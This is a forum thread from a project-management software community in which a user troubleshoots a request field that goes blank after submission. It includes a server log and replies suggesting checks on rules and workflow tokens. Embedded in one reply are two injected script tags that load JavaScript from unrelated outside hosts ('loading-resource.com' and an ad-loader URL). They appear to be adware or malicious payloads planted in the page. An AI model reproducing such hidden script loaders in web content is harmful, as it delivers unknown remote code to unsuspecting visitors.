Project and Portfolio Management Practitioners Forum
cancel
Showing results for 
Search instead for 
Did you mean: 

Field becomes blank after submission of the request..

Highlighted
Mohit_Agrawal
Frequent Visitor

Field becomes blank after submission of the request..

Hi All,

 

We have a request type in demand management. We are facing an issue with that: When a user submits the Request then one of the fields becomes blank after submission of the request.

 

 For Ex: At the time of submiting the Request, user fills the Field1 "IT-Team" then field2 is automatically populated as Mohit Agrawal (Acc. to SQL RULE)....The request is successfully submitted, but the Field2 (Mohit Agrawal) becomes blank.


This request is now basically supposed to go in the queue of person assigned in Field2...When Mohit opens the request then all the available action buttons are avilable but he cannt see his name in the Field2 of the request.

 

Hope I am clear with the example..plz help.

 

 

Below is the error in ServerLog.txt:

-----------------------------------------------------------------------------------------------
server:com.kintana.crt.server.CRTExecutionManager Batch ID: 755601:com.kintana.core.executions.commands:2012/10/23-04:07:26.267 MDT: KNTA_EXECUTION.SET_PARAMETER_TOKEN(
1:  VARCHAR P_PARAMETER_PREFIX => REQD,
2:  VARCHAR P_MODIFIER => null,
3:  INTEGER P_PRIMARY_ID => 128372,
4:  VARCHAR P_TOKEN_NAME => P_CS_DELETE,
5:  VARCHAR P_NEW_VALUE => null,
6:  VARCHAR P_NEW_VISIBLE_VALUE => null,
7:  VARCHAR P_TYPE => null,
8:  VARCHAR P_DATE_FORMAT => null,
9:  INTEGER P_LAST_UPDATED_BY => 102424,
10: INTEGER P_USR_DBG => 70,
11: INTEGER O_MESSAGE_TYPE => l_o_message_type,
12: VARCHAR O_MESSAGE_NAME => l_o_message_name,
13: VARCHAR O_MESSAGE => l_o_message);

server:com.kintana.crt.server.CRTExecutionManager Batch ID: 755601:com.kintana.core.executions.commands:2012/10/23-04:07:26.268 MDT: O_MESSAGE     :  value: null sqlType: VARCHAR
O_MESSAGE_NAME:  value: null sqlType: VARCHAR
O_MESSAGE_TYPE:  value: 0 sqlType: INTEGER

-----------------------------------------------------------------------------------------------

 

Thanks!!
Mohit Agrawal

4 REPLIES
Oscar_Pereira
Frequent Visitor

Re: Field becomes blank after submission of the request..

Hi Mohit,

 

Just to have a better understanding on the issue

 

What is the PPM version and sp ?

 

Please share the SQL rule  syntax  (i want to see the tokens and the way you are populating this field)

 

I think that once you populate the field, you should check in the database to confirm the value was commited before summiting the request.

 

Regards

Oscar Pereira

randull
HPE Expert

Re: Field becomes blank after submission of the request..

Hi Mohit,

 

Have you checked the rest of your rules? May be there is athat will be setting this field in black on submission.

Best regards,
Randall

-- Remember to give Kudos to answers! (click the KUDOS star)
"If you find that this or any post resolves your issue, please be sure to mark it as an accepted solution.”
jsalass
Frequent Visitor

Re: Field becomes blank after submission of the request..

Hi Mohit,

 

If the user Mohit is able to see the actions buttons that means that the field2 value was stored in the DB and the token was able to load that value in cache.

 

So, please check that you are using a token in the workflow step security for 1st step (or in this case the step where Mohit user is seeing the action buttons) and not Mohit user directly as the WF security value.

 

Then check the request type, as Randall mentioned, if there is another on page load rule clearing the field2 value.

 

Hope this helps!

 

Regards,

Jonathan

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
Mohit_Agrawal
Frequent Visitor

Re: Field becomes blank after submission of the request..

Hi Oscar,

Version is PPM8.02. And there is no problem with the rule as the same is working fine on DEV instance.

 

Hi Randall,
We have no rules on Page Load..

 

Hi Jonathan,
I have checked that we are using a token in the workflow step security.

 

Thanks!

Mohit Agrawal

//Add this to "OnDomLoad" event